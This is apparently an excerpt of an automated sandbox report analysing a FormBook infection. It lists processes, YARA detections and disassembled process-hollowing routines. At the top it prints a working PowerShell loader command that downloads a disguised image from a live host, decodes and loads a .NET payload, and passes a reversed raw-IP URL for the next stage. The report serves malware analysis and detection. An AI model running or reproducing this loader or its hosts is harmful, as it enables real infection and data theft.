                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                                  Imagebase:0xfa0000
                                                  File size:427'008 bytes
                                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:11
                                                  Start time:03:32:48
                                                  Start date:16/08/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                  Imagebase:0x830000
                                                  File size:64'704 bytes
                                                  MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.466373539.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.466373539.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.469509226.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.469509226.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:12
                                                  Start time:03:32:53
                                                  Start date:16/08/2024
                                                  Path:C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe"
                                                  Imagebase:0xf0000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:13
                                                  Start time:03:32:55
                                                  Start date:16/08/2024
                                                  Path:C:\Windows\SysWOW64\find.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\find.exe"
                                                  Imagebase:0x230000
                                                  File size:13'824 bytes
                                                  MD5 hash:5816034B0B629756163B80838853B730
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.620757047.00000000000F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.620757047.00000000000F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.620790814.00000000002C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.620790814.00000000002C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.620825188.0000000000330000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.620825188.0000000000330000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:moderate
                                                  Has exited:false

                                                  General

                                                  Target ID:14
                                                  Start time:03:33:07
                                                  Start date:16/08/2024
                                                  Path:C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe"
                                                  Imagebase:0xf0000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:16
                                                  Start time:03:33:21
                                                  Start date:16/08/2024
                                                  Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                  Imagebase:0x3e0000
                                                  File size:517'064 bytes
                                                  MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Disassembly

                                                  Code Analysis

                                                  Call Graph

                                                  • Entrypoint
                                                  • Decryption Function
                                                  • Executed
                                                  • Not Executed
                                                  • Show Help
                                                  callgraph 1 Error: Graph is empty

                                                  Module: Sheet1

                                                  Declaration
                                                  LineContent
                                                  1

                                                  Attribute VB_Name = "Sheet1"

                                                  2

                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                  3

                                                  Attribute VB_GlobalNameSpace = False

                                                  4

                                                  Attribute VB_Creatable = False

                                                  5

                                                  Attribute VB_PredeclaredId = True

                                                  6

                                                  Attribute VB_Exposed = True

                                                  7

                                                  Attribute VB_TemplateDerived = False

                                                  8

                                                  Attribute VB_Customizable = True

                                                  Module: Sheet2

                                                  Declaration
                                                  LineContent
                                                  1

                                                  Attribute VB_Name = "Sheet2"

                                                  2

                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                  3

                                                  Attribute VB_GlobalNameSpace = False

                                                  4

                                                  Attribute VB_Creatable = False

                                                  5

                                                  Attribute VB_PredeclaredId = True

                                                  6

                                                  Attribute VB_Exposed = True

                                                  7

                                                  Attribute VB_TemplateDerived = False

                                                  8

                                                  Attribute VB_Customizable = True

                                                  Module: Sheet3

                                                  Declaration
                                                  LineContent
                                                  1

                                                  Attribute VB_Name = "Sheet3"

                                                  2

                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                  3

                                                  Attribute VB_GlobalNameSpace = False

                                                  4

                                                  Attribute VB_Creatable = False

                                                  5

                                                  Attribute VB_PredeclaredId = True

                                                  6

                                                  Attribute VB_Exposed = True

                                                  7

                                                  Attribute VB_TemplateDerived = False

                                                  8

                                                  Attribute VB_Customizable = True

                                                  Module: ThisWorkbook

                                                  Declaration
                                                  LineContent
                                                  1

                                                  Attribute VB_Name = "ThisWorkbook"

                                                  2

                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                  3

                                                  Attribute VB_GlobalNameSpace = False

                                                  4

                                                  Attribute VB_Creatable = False

                                                  5

                                                  Attribute VB_PredeclaredId = True

                                                  6

                                                  Attribute VB_Exposed = True

                                                  7

                                                  Attribute VB_TemplateDerived = False

                                                  8

                                                  Attribute VB_Customizable = True

                                                  Reset < >

                                                    Executed Functions

                                                    Function 0021D01D Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.448889505.000000000021D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0021D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_21d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bd27ff621a8d7f8995fc499600dbdeb40b642444aee6eea360eff1b6bfe528e9
                                                    • Instruction ID: bc08efbad4d947ce6c67eb9db87f93f5022c031c089d1961963790d790314c0d
                                                    • Opcode Fuzzy Hash: bd27ff621a8d7f8995fc499600dbdeb40b642444aee6eea360eff1b6bfe528e9
                                                    • Instruction Fuzzy Hash: DF01F731524340EFE7104E15CCC47A7BBD8DFA9764F18C519DC480F182C3799981CAB1
                                                    Function 0021D01C Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.448889505.000000000021D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0021D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_21d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 98fa1e4f4a6a8a2a36c763894c1b0e6a93e12c57ec08ae5b209363857df0b460
                                                    • Instruction ID: ff488a86da297d51cc8093caeded41acf0a36e292bafef0236c8742b6e03033d
                                                    • Opcode Fuzzy Hash: 98fa1e4f4a6a8a2a36c763894c1b0e6a93e12c57ec08ae5b209363857df0b460
                                                    • Instruction Fuzzy Hash: 30F06271504244EEE7108E15CCC4BA2FBD8EB95724F18C55AED485B282C3799C84CAB1

                                                    Execution Graph

                                                    Execution Coverage:9.9%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:58.7%
                                                    Total number of Nodes:46
                                                    Total number of Limit Nodes:2
                                                    execution_graph 5224 614b38 5225 614b5f 5224->5225 5228 614c88 5225->5228 5229 614c98 5228->5229 5230 614c74 5229->5230 5233 614d50 5229->5233 5249 614d40 5229->5249 5234 614d83 5233->5234 5265 611724 5234->5265 5236 614f4c 5237 611730 Wow64SetThreadContext 5236->5237 5239 61504b 5236->5239 5237->5239 5238 61176c WriteProcessMemory 5243 615374 5238->5243 5239->5238 5240 615613 5241 61176c WriteProcessMemory 5240->5241 5242 615664 5241->5242 5244 611778 Wow64SetThreadContext 5242->5244 5246 615767 5242->5246 5243->5240 5245 61176c WriteProcessMemory 5243->5245 5244->5246 5245->5243 5247 611790 ResumeThread 5246->5247 5248 615819 5247->5248 5248->5229 5250 614d50 5249->5250 5251 611724 CreateProcessW 5250->5251 5252 614f4c 5251->5252 5255 61504b 5252->5255 5280 611730 5252->5280 5269 61176c 5255->5269 5256 615613 5257 61176c WriteProcessMemory 5256->5257 5258 615664 5257->5258 5262 615767 5258->5262 5273 611778 5258->5273 5259 615374 5259->5256 5261 61176c WriteProcessMemory 5259->5261 5261->5259 5277 611790 5262->5277 5266 615928 CreateProcessW 5265->5266 5268 615b1c 5266->5268 5268->5268 5270 615f90 WriteProcessMemory 5269->5270 5272 616070 5270->5272 5272->5259 5274 615c60 Wow64SetThreadContext 5273->5274 5276 615d1c 5274->5276 5276->5262 5278 6160d0 ResumeThread 5277->5278 5279 615819 5278->5279 5279->5229 5281 615c60 Wow64SetThreadContext 5280->5281 5283 615d1c 5281->5283 5283->5255

                                                    Executed Functions

                                                    Function 00614D50 Relevance: .7, Instructions: 658COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 254 614d50-614d81 255 614d83 254->255 256 614d88-614ebe 254->256 255->256 261 614ec0 256->261 262 614ec5-614efa 256->262 261->262 264 614f27-614f6c call 611724 262->264 265 614efc-614f26 262->265 269 614f95-614fbb 264->269 270 614f6e-614f8a 264->270 265->264 273 614fc2-615004 269->273 274 614fbd 269->274 270->269 278 615006 273->278 279 61500b-615037 273->279 274->273 278->279 281 615039-61506b call 611730 279->281 282 615098-6150c9 call 61173c 279->282 289 615094-615096 281->289 290 61506d-615089 281->290 287 6150f2-6150fc 282->287 288 6150cb-6150e7 282->288 291 615103-615126 287->291 292 6150fe 287->292 288->287 289->287 290->289 293 615128 291->293 294 61512d-615171 call 611748 291->294 292->291 293->294 301 615173-61518f 294->301 302 61519a-6151a3 294->302 301->302 303 6151a5-6151cd call 611754 302->303 304 6151cf-6151d1 302->304 306 6151d7-6151eb 303->306 304->306 308 615214-61521e 306->308 309 6151ed-615209 306->309 311 615220 308->311 312 615225-615249 308->312 309->308 311->312 317 615250-6152a2 call 611760 312->317 318 61524b 312->318 322 6152a4-6152b8 317->322 323 6152ba-6152bc 317->323 318->317 324 6152c2-6152d6 322->324 323->324 325 615313-61532d 324->325 326 6152d8-615312 call 611760 324->326 328 615356-615394 call 61176c 325->328 329 61532f-61534b 325->329 326->325 334 615396-6153b2 328->334 335 6153bd-6153c7 328->335 329->328 334->335 336 6153c9 335->336 337 6153ce-6153de 335->337 336->337 340 6153e0 337->340 341 6153e5-61540d 337->341 340->341 344 615414-615423 341->344 345 61540f 341->345 346 6155ee-61560d 344->346 345->344 347 615613-61563a 346->347 348 615428-615436 346->348 352 615641-615684 call 61176c 347->352 353 61563c 347->353 349 615438 348->349 350 61543d-615464 348->350 349->350 355 615466 350->355 356 61546b-615492 350->356 359 615686-6156a2 352->359 360 6156ad-6156b7 352->360 353->352 355->356 364 615494 356->364 365 615499-6154cd 356->365 359->360 362 6156b9 360->362 363 6156be-6156eb 360->363 362->363 372 6156f8-615704 363->372 373 6156ed-6156f7 363->373 364->365 370 6154d3-6154e1 365->370 371 6155b9-6155c6 365->371 374 6154e3 370->374 375 6154e8-6154ef 370->375 378 6155c8 371->378 379 6155cd-6155e1 371->379 376 615706 372->376 377 61570b-61571b 372->377 373->372 374->375 380 6154f1 375->380 381 6154f6-61553e 375->381 376->377 382 615722-615753 377->382 383 61571d 377->383 378->379 384 6155e3 379->384 385 6155e8 379->385 380->381 395 615540 381->395 396 615545-61556a call 61176c 381->396 388 615755-615762 call 611778 382->388 389 6157b4-6157e5 call 611784 382->389 383->382 384->385 385->346 393 615767-615787 388->393 400 6157e7-615803 389->400 401 61580e-615814 call 611790 389->401 398 6157b0-6157b2 393->398 399 615789-6157a5 393->399 395->396 402 61556f-61558f 396->402 398->401 399->398 400->401 408 615819-615839 401->408 404 615591-6155ad 402->404 405 6155b8 402->405 404->405 405->371 409 615862-615905 408->409 410 61583b-615857 408->410 410->409
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: ContextMemoryProcessThreadWow64Write
                                                    • String ID:
                                                    • API String ID: 3696009080-0
                                                    • Opcode ID: e8ff2f2d1241f93eb910fa49837bffd74c3e3ab3061ab25af695bd336e8c69c0
                                                    • Instruction ID: b2fe77aad1d1941ed803dab93a6ca0190dd6ba7438c60c717d747acaa88a5204
                                                    • Opcode Fuzzy Hash: e8ff2f2d1241f93eb910fa49837bffd74c3e3ab3061ab25af695bd336e8c69c0
                                                    • Instruction Fuzzy Hash: F362DC74E01228CFEB64DF25C885BEDBBB2AB89301F5481EA950DA7291DB345EC5CF50
                                                    Function 00614D40 Relevance: .5, Instructions: 520COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 420 614d40-614d81 422 614d83 420->422 423 614d88-614ebe 420->423 422->423 428 614ec0 423->428 429 614ec5-614efa 423->429 428->429 431 614f27-614f6c call 611724 429->431 432 614efc-614f26 429->432 436 614f95-614fbb 431->436 437 614f6e-614f8a 431->437 432->431 440 614fc2-615004 436->440 441 614fbd 436->441 437->436 445 615006 440->445 446 61500b-615037 440->446 441->440 445->446 448 615039-61506b call 611730 446->448 449 615098-6150c9 call 61173c 446->449 456 615094-615096 448->456 457 61506d-615089 448->457 454 6150f2-6150fc 449->454 455 6150cb-6150e7 449->455 458 615103-615126 454->458 459 6150fe 454->459 455->454 456->454 457->456 460 615128 458->460 461 61512d-615171 call 611748 458->461 459->458 460->461 468 615173-61518f 461->468 469 61519a-6151a3 461->469 468->469 470 6151a5-6151cd call 611754 469->470 471 6151cf-6151d1 469->471 473 6151d7-6151eb 470->473 471->473 475 615214-61521e 473->475 476 6151ed-615209 473->476 478 615220 475->478 479 615225-615249 475->479 476->475 478->479 484 615250-6152a2 call 611760 479->484 485 61524b 479->485 489 6152a4-6152b8 484->489 490 6152ba-6152bc 484->490 485->484 491 6152c2-6152d6 489->491 490->491 492 615313-61532d 491->492 493 6152d8-615312 call 611760 491->493 495 615356-615394 call 61176c 492->495 496 61532f-61534b 492->496 493->492 501 615396-6153b2 495->501 502 6153bd-6153c7 495->502 496->495 501->502 503 6153c9 502->503 504 6153ce-6153de 502->504 503->504 507 6153e0 504->507 508 6153e5-61540d 504->508 507->508 511 615414-615423 508->511 512 61540f 508->512 513 6155ee-61560d 511->513 512->511 514 615613-61563a 513->514 515 615428-615436 513->515 519 615641-615684 call 61176c 514->519 520 61563c 514->520 516 615438 515->516 517 61543d-615464 515->517 516->517 522 615466 517->522 523 61546b-615492 517->523 526 615686-6156a2 519->526 527 6156ad-6156b7 519->527 520->519 522->523 531 615494 523->531 532 615499-6154cd 523->532 526->527 529 6156b9 527->529 530 6156be-6156eb 527->530 529->530 539 6156f8-615704 530->539 540 6156ed-6156f7 530->540 531->532 537 6154d3-6154e1 532->537 538 6155b9-6155c6 532->538 541 6154e3 537->541 542 6154e8-6154ef 537->542 545 6155c8 538->545 546 6155cd-6155e1 538->546 543 615706 539->543 544 61570b-61571b 539->544 540->539 541->542 547 6154f1 542->547 548 6154f6-61553e 542->548 543->544 549 615722-615753 544->549 550 61571d 544->550 545->546 551 6155e3 546->551 552 6155e8 546->552 547->548 562 615540 548->562 563 615545-61556a call 61176c 548->563 555 615755-615762 call 611778 549->555 556 6157b4-6157e5 call 611784 549->556 550->549 551->552 552->513 560 615767-615787 555->560 567 6157e7-615803 556->567 568 61580e-615814 call 611790 556->568 565 6157b0-6157b2 560->565 566 615789-6157a5 560->566 562->563 569 61556f-61558f 563->569 565->568 566->565 567->568 575 615819-615839 568->575 571 615591-6155ad 569->571 572 6155b8 569->572 571->572 572->538 576 615862-615905 575->576 577 61583b-615857 575->577 577->576
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9d9b1b34621710182f48b1f34b87287b29c65236490cc7d9acaeaae96f889fe
                                                    • Instruction ID: ecbdb940f6473bb68561b54f166f891d021258b1e13f9bcf91b07c26221e49d0
                                                    • Opcode Fuzzy Hash: b9d9b1b34621710182f48b1f34b87287b29c65236490cc7d9acaeaae96f889fe
                                                    • Instruction Fuzzy Hash: F632DD74E012288FEB64DF25C895BEDBBB2AF89300F5481EA951DA7291DB345EC5CF40
                                                    Function 007B203C Relevance: 6.3, Strings: 4, Instructions: 1321COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 7b203c-7b203f 1 7b2041-7b2043 0->1 2 7b2045-7b204d 0->2 1->2 3 7b204f-7b2054 2->3 4 7b2065-7b2069 2->4 5 7b2059-7b2063 3->5 6 7b2055 3->6 7 7b206f-7b2073 4->7 8 7b2194-7b219e 4->8 5->4 6->5 9 7b2057 6->9 10 7b20b3 7->10 11 7b2075-7b2086 7->11 12 7b21ac-7b21b2 8->12 13 7b21a0-7b21a9 8->13 9->4 14 7b20b5-7b20b7 10->14 21 7b21ec-7b223b 11->21 22 7b208c-7b2091 11->22 16 7b21b8-7b21c4 12->16 17 7b21b4-7b21b6 12->17 14->8 19 7b20bd-7b20c1 14->19 18 7b21c6-7b21e9 16->18 17->18 19->8 24 7b20c7-7b20cb 19->24 33 7b243e-7b244d 21->33 34 7b2241-7b2246 21->34 25 7b20a9-7b20b1 22->25 26 7b2093-7b2099 22->26 24->8 28 7b20d1-7b20f7 24->28 25->14 29 7b209b 26->29 30 7b209d-7b20a7 26->30 28->8 45 7b20fd-7b2101 28->45 29->25 30->25 37 7b2248-7b224e 34->37 38 7b225e-7b2262 34->38 42 7b2252-7b225c 37->42 43 7b2250 37->43 40 7b2268-7b226a 38->40 41 7b23e7-7b23f1 38->41 46 7b227a 40->46 47 7b226c-7b2278 40->47 48 7b23fd-7b2403 41->48 49 7b23f3-7b23fa 41->49 42->38 43->38 51 7b2103-7b210c 45->51 52 7b2124 45->52 53 7b227c-7b227e 46->53 47->53 54 7b2409-7b2415 48->54 55 7b2405-7b2407 48->55 56 7b210e-7b2111 51->56 57 7b2113-7b2120 51->57 59 7b2127-7b2134 52->59 53->41 58 7b2284-7b22a3 53->58 60 7b2417-7b243b 54->60 55->60 61 7b2122 56->61 57->61 70 7b22b3 58->70 71 7b22a5-7b22b1 58->71 65 7b213a-7b2191 59->65 61->59 72 7b22b5-7b22b7 70->72 71->72 72->41 73 7b22bd-7b22c1 72->73 73->41 74 7b22c7-7b22cb 73->74 75 7b22de 74->75 76 7b22cd-7b22dc 74->76 77 7b22e0-7b22e2 75->77 76->77 77->41 78 7b22e8-7b22ec 77->78 78->41 79 7b22f2-7b2311 78->79 82 7b2329-7b2334 79->82 83 7b2313-7b2319 79->83 86 7b2343-7b235f 82->86 87 7b2336-7b2339 82->87 84 7b231b 83->84 85 7b231d-7b231f 83->85 84->82 85->82 88 7b237c-7b2386 86->88 89 7b2361-7b2374 86->89 87->86 90 7b238a-7b23d8 88->90 91 7b2388 88->91 89->88 92 7b23dd-7b23e4 90->92 91->92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444315579.00000000007B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: L4#p$L4#p$L4#p$d=v
                                                    • API String ID: 0-2284860627
                                                    • Opcode ID: f38d8b8dd2331e5d2d5bad3f83721374e6b0cd72c7f0baeb5f2c77f7916ee6c3
                                                    • Instruction ID: 8214c69822db22d9e10f3d6cb066337d06227d360fb9f59f6ffe468bd0c111af
                                                    • Opcode Fuzzy Hash: f38d8b8dd2331e5d2d5bad3f83721374e6b0cd72c7f0baeb5f2c77f7916ee6c3
                                                    • Instruction Fuzzy Hash: 3BB12631B05348DFDF259F68C8407EE77A2AF85311F24846AE9158B2A2CB79CD47C7A1
                                                    Function 007B0BB5 Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 99 7b0bb5-7b0bb8 100 7b0bba-7b0bbc 99->100 101 7b0bbe-7b0bc6 99->101 100->101 102 7b0bc8-7b0bce 101->102 103 7b0bde-7b0be2 101->103 104 7b0bd2-7b0bdc 102->104 105 7b0bd0 102->105 106 7b0be8-7b0bec 103->106 107 7b0d43-7b0d4d 103->107 104->103 105->103 110 7b0bff 106->110 111 7b0bee-7b0bfd 106->111 108 7b0d5b-7b0d61 107->108 109 7b0d4f-7b0d58 107->109 113 7b0d63-7b0d65 108->113 114 7b0d67-7b0d73 108->114 115 7b0c01-7b0c03 110->115 111->115 116 7b0d75-7b0d93 113->116 114->116 115->107 117 7b0c09-7b0c29 115->117 123 7b0c2b-7b0c46 117->123 124 7b0c48 117->124 125 7b0c4a-7b0c4c 123->125 124->125 125->107 127 7b0c52-7b0c54 125->127 128 7b0c56-7b0c62 127->128 129 7b0c64 127->129 131 7b0c66-7b0c68 128->131 129->131 131->107 132 7b0c6e-7b0c8e 131->132 135 7b0c90-7b0c96 132->135 136 7b0ca6-7b0caa 132->136 137 7b0c9a-7b0c9c 135->137 138 7b0c98 135->138 139 7b0cac-7b0cb2 136->139 140 7b0cc4-7b0cc8 136->140 137->136 138->136 141 7b0cb6-7b0cc2 139->141 142 7b0cb4 139->142 143 7b0ccf-7b0cd1 140->143 141->140 142->140 145 7b0ce9-7b0d40 143->145 146 7b0cd3-7b0cd9 143->146 148 7b0cdb 146->148 149 7b0cdd-7b0cdf 146->149 148->145 149->145
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444315579.00000000007B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: l;v$l;v
                                                    • API String ID: 0-572271346
                                                    • Opcode ID: e36157234313dee070356abed62ebc23d8c2b06a54394e745953c2c827053de4
                                                    • Instruction ID: a11b243c5a4ffc7c1db321efe2f6cfaa03dfc1049aaf3e6a81d241483fbd149d
                                                    • Opcode Fuzzy Hash: e36157234313dee070356abed62ebc23d8c2b06a54394e745953c2c827053de4
                                                    • Instruction Fuzzy Hash: 7F41F035704302CBDF295A7498103FBB7A2AB91311B2485BAC81A9B2A1DF7DDD41C7B2
                                                    Function 0061591C Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 150 61591c-6159b3 152 6159b5-6159c7 150->152 153 6159ca-6159d8 150->153 152->153 154 6159da-6159ec 153->154 155 6159ef-615a2b 153->155 154->155 156 615a2d-615a3c 155->156 157 615a3f-615b1a CreateProcessW 155->157 156->157 161 615b23-615bec 157->161 162 615b1c-615b22 157->162 171 615c22-615c2d 161->171 172 615bee-615c17 161->172 162->161 175 615c2e 171->175 172->171 175->175
                                                    APIs
                                                    • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00615B07
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.444131818.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_610000_powershell.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: b65c6f1ebe9bd6e237a0e0171a1105252a219418599b482a866d5118ea6784f7
                                                    • Instruction ID: ba667a8ce5c1297040aab1766551e72a241613281f79863bc79cb23e95e74b57
                                                    • Opcode Fuzzy Hash: b65c6f1ebe9bd6e237a0e0171a1105252a219418599b482a866d5118ea6784f7
                                                    • Instruction Fuzzy Hash: C981CF74D0026DDFDB25CFA5C880BEEBBB1AB49304F0490AAE549B7210DB749A85CF94
                                                    Function 00611724 Relevance: 1.7, APIs: 1, Instructions: 239processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 177 611724-6159b3 179 6159b5-6159c7 177->179 180 6159ca-6159d8 177->180 179->180 181 6159da-6159ec 180->181 182 6159ef-615a2b 180->182 181->182 183 615a2d-615a3c 182->183 184 615a3f-615b1a CreateProcessW 182->184 183->184 188 615b23-615bec 184->188 189 615b1c-615b22 184->189 198 615c22-615c2d 188->198 199 615bee-615c17 188->199 189->188 202 615c2e 198->202 199->198 202->202
                                                    APIs
                                                    • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00615B07
                                                    Memory Dump Source
